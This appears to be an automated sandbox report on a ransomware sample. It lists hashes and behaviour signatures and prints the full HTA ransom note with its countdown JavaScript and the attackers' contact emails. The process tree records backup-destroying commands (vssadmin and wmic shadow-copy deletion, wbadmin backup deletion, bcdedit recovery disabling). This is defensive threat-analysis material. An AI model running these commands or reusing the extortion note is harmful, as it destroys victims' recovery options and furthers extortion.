Analysis
-
max time kernel
169s -
max time network
166s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
16-01-2022 03:14
General
-
Target
svchost.exe
-
Size
213KB
-
MD5
39f34aa65e3a95a53f3ec0675fc37905
-
SHA1
b8206089a3841464c72ee695951854dfe08a82cd
-
SHA256
8e7393013f240334efe2ca52c8a3554628c479becab2b691d114e1e8b3ccd51d
-
SHA512
7c45d8ba6f080cccaaa3c663d44a796c077f786f48cd392bcb9fa7e60d3b424aa90ecb1ed3c1c810b1607610db42a59eb0a9cc452579e454ca6443b2b249b2cb
Score
10/10
Malware Config
Extracted
Path
C:\Users\Public\Desktop\how_to_decrypt.hta
Ransom Note
ENCRYPTED
11100001111011111111100001111011111100
Time left for payment
All your documents, databases, backups, and other critical files were encrypted.
Our software used the AES cryptographic algorithm (you can find related information in Wikipedia).
It happened because of security problems on your server, and you cannot use any of these files anymore. The only way to recover your data is to buy a decryption key from us.
To do this, please send your unique ID to the contacts below.
E-mail:
copy
Unique ID:
copy
Right after payment, we will send you a specific decoding software that will decrypt all of your files. If you have not received the response within 24 hours, please contact us by e-mail %RESERVE_CONTACT% .
We've copied all of your documents, databases, and other essential files.
If you try to cheat us or do anything else besides our offer, we'll use the info we have against you.
The price depends on how soon you will contact us.
You have only four days to make the right choice! If we won't receive your payment within this period, your domain network can be attacked again.
Hurry up!
Attention!
! Do not try to recover files yourself. this process can damage your data and recovery will become impossible.
! Do not waste time trying to find the solution on the Internet. The longer you wait, the higher will become the decryption key price.
! Do not contact any intermediaries. They will buy the key from us and sell it to you at a higher price.
What guarantees do you have?
Before payment, we can decrypt three files for free. The total file size should be less than 5MB (before archiving), and the files should not contain any important information (databases, backups, large tables, etc.)
var max_discount = 50;
var start_date = new Date('January 16 2022 03:14:59');
var discount_date = new Date('January 19 2022 03:14:59');
var end_date = new Date('January 21 2022 03:14:59');
var main_contact = 'mefistofel@onionmail.org';
var hid = '[82BF4026-2CF0DA92]';
var second_contact = 'mefistofel@msgsafe.io';
var sd = end_date;
var dn = new Date();
var zoc, ddGlobal;
function document.onblur() {
alert('Attention! This important information for you!');
}
function setContacts() {
document.getElementById('main_contact').innerHTML = main_contact;
document.getElementById('second_contact').innerHTML = second_contact;
document.getElementById('hid').innerHTML = hid;
}
function countDiscount() {
var term_current = new Date().getTime() - start_date.getTime();
var term_full = discount_date.getTime() - start_date.getTime();
var delta = discount_date.getTime() - new Date().getTime();
delta = new Date(delta);
var dt = document.getElementById('pwr');
var timer_discount = document.getElementById('timer_discount');
var discount = document.getElementById('discount');
var hours_to_end = Math.floor(term_full / 1000 / 3600);
var hours_current = Math.floor(term_current / 1000 / 3600);
if (discount_date.getTime() > dn.getTime()) {
var disc_per_hour = parseFloat(max_discount / hours_to_end).toFixed(2);
var cur_discount = Math.floor(max_discount - (disc_per_hour * hours_current));
if (discount) {
discount.innerHTML = cur_discount + '% discount';
}
}
if (cur_discount <= 25) {
dt.style.cssText = 'border: 1px solid #FFC000;';
if (timer_discount) {
timer_discount.style.background = '#FFC000';
}
}
if (sd.getTime() < dn.getTime() || cur_discount < 5) {
dt.style.cssText = 'border: 1px solid #F53636; background-color: #F53636; padding: 16px 20px;';
dt.innerHTML = '<div style="font-size: 16px; color: #ffffff; text-align: center; display: block; font-weight: bold;">Decryption key can be bought at standard cost.</div><div style="font-size: 13px; color: #fff; text-align: center; margin-top: 10px">You need to hurry up to decrypt your data because all your files will be destroyed soon.</div>';
}
var dd = (delta.getUTCDate()-1) + ((delta.getUTCMonth()) * 31);
var hh = delta.getUTCHours();
var mm = delta.getUTCMinutes();
var ss = delta.getUTCSeconds();
if (dd!=1) { dd=dd+' days'; } else { dd=dd+' day'; }
if (hh<10) { hh='0'+hh; }
if (mm<10) { mm='0'+mm; }
if (ss<10) { ss='0'+ss; }
if (timer_discount) {
timer_discount.innerHTML = dd + ' ' + hh+':'+mm+':'+ss;
}
}
function ChangeTime() {
var sd = end_date;
var dn = new Date();
if (sd.getTime() < dn.getTime()) {
var dt = document.getElementById('lctw');
dt.innerHTML = '<b>Soon, you won\'t be able to decrypt your files. Contact us immediately!</b>';
dt.style.cssText = 'background-color: #F53636; color: #ffffff; font-weight: bold; padding: 19px 24px; margin: 17px 0 24px; text-align: center; font-size: 20px;';
zoc = 2;
} else {
var delta = sd.getTime() - dn.getTime();
delta = new Date(delta);
var dd = (delta.getUTCDate()-1) + ((delta.getUTCMonth()) * 31);
ddGlobal = parseInt(dd);
var hh = delta.getUTCHours();
var mm = delta.getUTCMinutes();
var ss = delta.getUTCSeconds();
if (dd!=1) { dd=dd+' days'; } else { dd=dd+' day'; }
if (hh<10) { hh='0'+hh; }
if (mm<10) { mm='0'+mm; }
if (ss<10) { ss='0'+ss; }
var dt = document.getElementById('file_lost');
if (dt) {
dt.innerHTML= dd+' '+hh+':'+mm+':'+ss;
}
}
}
var count = 100, interval = 10, intervalID;
function blink() {
if (ddGlobal == 0 && zoc != 2) {
var dt = document.getElementById('file_lost');
var dt2 = document.getElementById('text_file_lost');
var test = document.getElementById('test');
if (count == 100) {
intervalId = setInterval(function () {
dt.style.filter = 'alpha(opacity='+count+')';
dt2.style.filter = 'alpha(opacity='+count+')';
count = count - 2;
if (count == 20) clearInterval(intervalId);
}, interval);
}
if (count == 20) {
intervalId = setInterval(function () {
dt.style.filter = 'alpha(opacity='+count+')';
dt2.style.filter = 'alpha(opacity='+count+')';
count = count + 2;
if (count == 100) clearInterval(intervalId);
}, interval);
}
}
}
function getRandomArbitrary(min, max) {
min = Math.ceil(min);
max = Math.floor(max);
return Math.floor(Math.random() * (max - min)) + min;
}
function Rndom() {
var dt=document.getElementById('rc');
var xx='';
var i=0;
while (i < 40) {
xx=xx+getRandomArbitrary(0,2);
i=i+1;
}
rc.innerHTML= xx;
}
function Start() {
window.resizeTo(850,720);
setContacts();
//ChangeTime();
//setInterval(ChangeTime, 1000);
//countDiscount();
//setInterval(countDiscount, 1000);
setInterval(blink, 100);
setInterval(Rndom,100);
}
function copytext(s) {
window.clipboardData.setData("Text",s);
alert(s+' copied to clipboard');
}
function Restart() {
alert('Attention! This important information for you!');
}
var countDownDate = new Date().getTime() + 345600000;
var x = setInterval(function() {
var now = new Date().getTime();
var distance = countDownDate - now;
var days = Math.floor(distance / (1000 * 60 * 60 * 24));
var hours = Math.floor((distance % (1000 * 60 * 60 * 24)) / (1000 * 60 * 60));
var minutes = Math.floor((distance % (1000 * 60 * 60)) / (1000 * 60));
var seconds = Math.floor((distance % (1000 * 60)) / 1000);
document.getElementById("timer").innerHTML = days + "d " + hours + "h "
+ minutes + "m " + seconds + "s ";
if (distance < 0) {
clearInterval(x);
document.getElementById("timer").innerHTML = "EXPIRED";
}
}, 1000);
Emails
mefistofel@onionmail.org
mefistofel@msgsafe.io
Signatures
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies extensions of user files 2 IoCs
Ransomware generally changes the extension on encrypted files.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
-
Modifies Internet Explorer settings 1 TTPs 1 IoCs
-
Modifies registry class 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 43 IoCs
-
Suspicious use of FindShellTrayWindow 46 IoCs
-
Suspicious use of WriteProcessMemory 32 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\svchost.exe"C:\Users\Admin\AppData\Local\Temp\svchost.exe"1⤵
- Modifies extensions of user files
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c "vssadmin delete shadows /all /quiet"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\vssadmin.exevssadmin delete shadows /all /quiet3⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c "wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c "wbadmin DELETE BACKUP -keepVersions:0"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c "wmic SHADOWCOPY DELETE"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic SHADOWCOPY DELETE3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c "bcdedit /set {default} recoveryenabled No"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c "bcdedit /set {default} bootstatuspolicy ignoreallfailures"2⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Windows Explorer.lnk[mefistofel@onionmail.org].[82BF4026-2CF0DA92]1⤵
- Modifies registry class
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\Desktop\how_to_decrypt.hta"1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Public\Desktop\how_to_decrypt.htaFilesize
13KB
MD584f412c9fd3f32ed12871878f9cfb97b
SHA18b4fe81a95a4ec80695788b3668911ed0840bdde
SHA2560877cff3c9c4192c9e8a2a14c17122aa27a876d63c798dbbfe6bca867a5a800f
SHA512d716168985f10523817af8c7c32e74ed422a9cb924865852b2d9f261e77372ca3ed19332939e6ad8bd04e1c8783485abf82e9bce37e2f1cb74a5c6e10a5d5d21
-
memory/520-59-0x0000000000000000-mapping.dmp
-
memory/584-55-0x0000000000000000-mapping.dmp
-
memory/776-56-0x0000000000000000-mapping.dmp
-
memory/824-60-0x0000000000000000-mapping.dmp
-
memory/976-54-0x0000000076491000-0x0000000076493000-memory.dmpFilesize
8KB
-
memory/1224-61-0x0000000000000000-mapping.dmp
-
memory/1356-58-0x0000000000000000-mapping.dmp
-
memory/1380-57-0x0000000000000000-mapping.dmp
-
memory/1964-62-0x0000000000000000-mapping.dmp
-
memory/5228-63-0x000007FEFC451000-0x000007FEFC453000-memory.dmpFilesize
8KB